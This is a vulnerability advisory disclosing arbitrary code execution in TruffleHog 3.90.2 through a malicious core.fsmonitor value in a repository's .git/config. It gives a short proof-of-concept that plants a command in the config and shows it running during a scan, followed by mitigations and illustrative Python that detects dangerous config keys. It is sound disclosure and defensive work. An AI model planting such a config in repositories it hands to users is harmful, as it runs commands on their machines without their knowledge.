Talos Vulnerability Report

TALOS-2025-2243

Truffle Security Co. TruffleHog git arbitrary code execution vulnerability

October 20, 2025
CVE Number

CVE-2025-41390

SUMMARY

An arbitrary code execution vulnerability exists in the git functionality of Truffle Security Co. TruffleHog 3.90.2. A specially crafted repository can lead to arbitrary code execution. An attacker can provide a malicious repository to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Truffle Security Co. TruffleHog 3.90.2

PRODUCT URLS

TruffleHog - https://trufflesecurity.com/trufflehog

CVSSv3 SCORE

7.8 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-829 - Inclusion of Functionality from Untrusted Control Sphere

DETAILS

TruffleHog is an open-source tool designed to help developers and security teams detect secrets, such as API keys, passwords, and credentials, that may have been accidentally committed to version control systems like Git. It scans repositories for high-entropy strings and patterns that resemble sensitive information, helping organizations prevent data leaks and maintain secure coding practices.

Client-side Git hooks are scripts typically found under the .git/hooks directory.
These hooks are executed locally by Git subcommands to assist with repository maintenance, automation, continuous integration (CI), and other custom tasks.
They are not under the repo’s version control and are not copied with git clone.
However, if a repo is copied file-for-file, such as via tar, cp, or rsync, the hooks will be present on the destination, and there are a variety of situations that can unexpectedly trigger them.
One particularly dangerous hook is the one controlled via the core.fsmonitor configuration option. This setting allows Git to invoke a custom script or program to optimize file system monitoring performance.
Importantly, the fsmonitor hook is triggered automatically during operations like git status, which is used implicitly by many third-party tools (e.g., IDEs, Git GUIs, or CI agents) without explicit user invocation.
If an attacker manages to inject a malicious core.fsmonitor value into a repository’s .git/config file, for example, by:

  • Crafting a malicious Git repository with a specially crafted local configuration,
  • Compressing the repository into an archive and delivering it to a victim (e.g., via email or file sharing),
  • Having the victim open the repository in a vulnerable application that triggers Git operations like git status,

this can result in arbitrary command execution on the victim’s machine without their knowledge.

The TruffleHog Git repository scanner uses the git client with default settings, which causes Git to read configuration values from the repository’s .git/config file. If a malicious fsmonitor property is present, it may lead to arbitrary command execution, as Git will invoke the specified command automatically during certain operations (e.g., git status). This behavior can be demonstrated using the following test scenario:

tester@tester-Virtual-Machine:~$ mkdir EvilRepo
tester@tester-Virtual-Machine:~$ cd EvilRepo/
tester@tester-Virtual-Machine:~/EvilRepo$ git init
tester@tester-Virtual-Machine:~/EvilRepo$ echo 'fsmonitor = "id > /tmp/0wn3d"' > .git/config
tester@tester-Virtual-Machine:~/EvilRepo$ cat .git/config 
[core]
    repositoryformatversion = 0
    filemode = true
    bare = false
    logallrefupdates = true
    fsmonitor = "id > /tmp/0wn3d"

tester@tester-Virtual-Machine:~/EvilRepo$ file /tmp/0wn3d
/tmp/0wn3d: cannot open `/tmp/0wn3d' (No such file or directory)

With the repository prepared this way, we can perform a scan with TruffleHog:

tester@tester-Virtual-Machine:~/tools$ ./trufflehog git file:///home/tester/EvilRepo/
 TruffleHog. Unearth your secrets. 

2025-07-28T20:36:25+02:00	info-0	trufflehog	running source	{"source_manager_worker_id": "fpRQ7", "with_units": true}
2025-07-28T20:36:25+02:00	info-0	trufflehog	scanning repo	{"source_manager_worker_id": "fpRQ7", "unit_kind": "dir", "unit": "/home/tester/EvilRepo/", "repo": "/home/tester/EvilRepo/"}
2025-07-28T20:36:25+02:00	info-0	trufflehog	finished scanning	{"chunks": 0, "bytes": 0, "verified_secrets": 0, "unverified_secrets": 0, "scan_duration": "10.608999ms", "trufflehog_version": "3.90.2", "verification_caching": {"Hits":0,"Misses":0,"HitsWasted":0,"AttemptsSaved":0,"VerificationTimeSpentMS":0}}
tester@tester-Virtual-Machine:~/tools$ file /tmp/0wn3d 
/tmp/0wn3d: ASCII text
tester@tester-Virtual-Machine:~/tools$ cat /tmp/0wn3d 
uid=1(daemon) gid=1(daemon) groups=1(daemon)

Client-side git hooks should be disabled by default at the system level. If this is not possible, then affected tools should be patched by adding CLI options to override dangerous config options. Example: git -c core.fsmonitor="" status.

Developers and tooling authors should treat this vector with caution and avoid blindly trusting Git configurations from untrusted sources.
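The two defensive measures above, checking an untrusted repository's .git/config for execution-affecting keys before touching it and neutralising those keys on the git command line, are shown in the following added example. This is illustrative code written for this page, not TruffleHog's code or the fix the vendor shipped. It assumes the tool shells out to the git binary; core.hooksPath=/dev/null is a widely used setting documented in git-config(1) and is not taken from the advisory; the sample config and hook path are constructed placeholders.

```python
import re
import sys
from typing import Dict, List, Tuple

# Configuration keys whose values name something Git will execute or load:
# core.fsmonitor is the key abused in the advisory; core.hooksPath and
# include.path are documented in git-config(1). Extend to taste.
EXEC_KEYS = {
    "core.fsmonitor": "fsmonitor hook, run implicitly by git status and similar commands",
    "core.hookspath": "redirects all client-side hook lookups to a directory of the repo's choosing",
    "include.path": "pulls in another config file, which may itself set the keys above",
}

_SECTION_RE = re.compile(r'^\s*\[\s*([A-Za-z0-9.-]+)(?:\s+"((?:[^"\\]|\\.)*)")?\s*\]\s*$')
_KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*(?:=\s*(.*))?$')


def parse_git_config(text: str) -> Dict[str, str]:
    """Flatten a .git/config into {"section.subsection.key": value}.

    Section and key names are lower-cased as Git does; subsection names keep
    their case. A key without '=' is boolean true. Pre-scan heuristic only:
    it does not follow include.path/includeIf and does not process escapes.
    """
    config: Dict[str, str] = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        m = _SECTION_RE.match(line)
        if m:
            name, sub = m.group(1).lower(), m.group(2)
            section = f"{name}.{sub}" if sub is not None else name
            continue
        m = _KEY_RE.match(line)
        if m and section is not None:
            key, value = m.group(1).lower(), m.group(2)
            if value is None:
                value = "true"
            elif value.startswith('"'):
                # quoted value: keep everything up to the closing quote, drop trailing comment
                end = value.find('"', 1)
                value = value[1:end] if end != -1 else value[1:]
            else:
                # unquoted value: a '#' or ';' starts a comment
                value = re.split(r"\s*[#;]", value, maxsplit=1)[0].strip()
            config[f"{section}.{key}"] = value
    return config


def find_dangerous_config(text: str) -> List[Tuple[str, str, str]]:
    """Return (key, value, reason) for each execution-affecting key that is set."""
    findings = []
    for key, value in parse_git_config(text).items():
        # An empty string or "false" disables fsmonitor; anything else is reported for review.
        if key == "core.fsmonitor" and value.lower() in ("", "false"):
            continue
        if key in EXEC_KEYS:
            findings.append((key, value, EXEC_KEYS[key]))
    return findings


def hardened_git_argv(git_args: List[str], git_binary: str = "git") -> List[str]:
    """Build a git command line that overrides repo-supplied hook settings.

    `-c key=value` takes precedence over the repository's .git/config for this
    invocation only, as in the advisory's example `git -c core.fsmonitor="" status`.
    core.hooksPath=/dev/null makes every hook lookup fail, so no hook can run.
    """
    overrides = ["core.fsmonitor=", "core.hooksPath=/dev/null"]
    argv = [git_binary]
    for override in overrides:
        argv += ["-c", override]
    return argv + list(git_args)


# Constructed sample modelled on the advisory's .git/config layout; the hook
# path is a placeholder, not the advisory's payload.
SAMPLE_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tfilemode = true
\tbare = false
\tlogallrefupdates = true
\tfsmonitor = "/tmp/untrusted-hook.sh"   ; set by whoever packaged the repo
[remote "origin"]
\turl = https://example.invalid/repo.git
"""


if __name__ == "__main__":
    # Usage: python check_git_config.py /path/to/repo/.git/config (defaults to the sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CONFIG
    for key, value, reason in find_dangerous_config(text):
        print(f"REFUSE TO SCAN: {key} = {value!r} ({reason})")
    print("hardened argv:", hardened_git_argv(["status", "--porcelain"]))
```

A scanner would run find_dangerous_config on the repository's config before any git subcommand and refuse (or warn) when it returns findings; hardened_git_argv is the belt-and-braces complement for every git invocation the tool makes, so a key this heuristic misses still cannot select a hook.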

VENDOR RESPONSE

Vendor advisory: https://trufflesecurity.com/blog/contributor-spotlight-adam-reiser-of-cisco-talos

TIMELINE

2025-08-19 - Initial Vendor Contact
2025-08-19 - Vendor Disclosure
2025-10-17 - Vendor Patch Release
2025-10-20 - Public Release

Credit

Adam Reiser of Cisco ASIG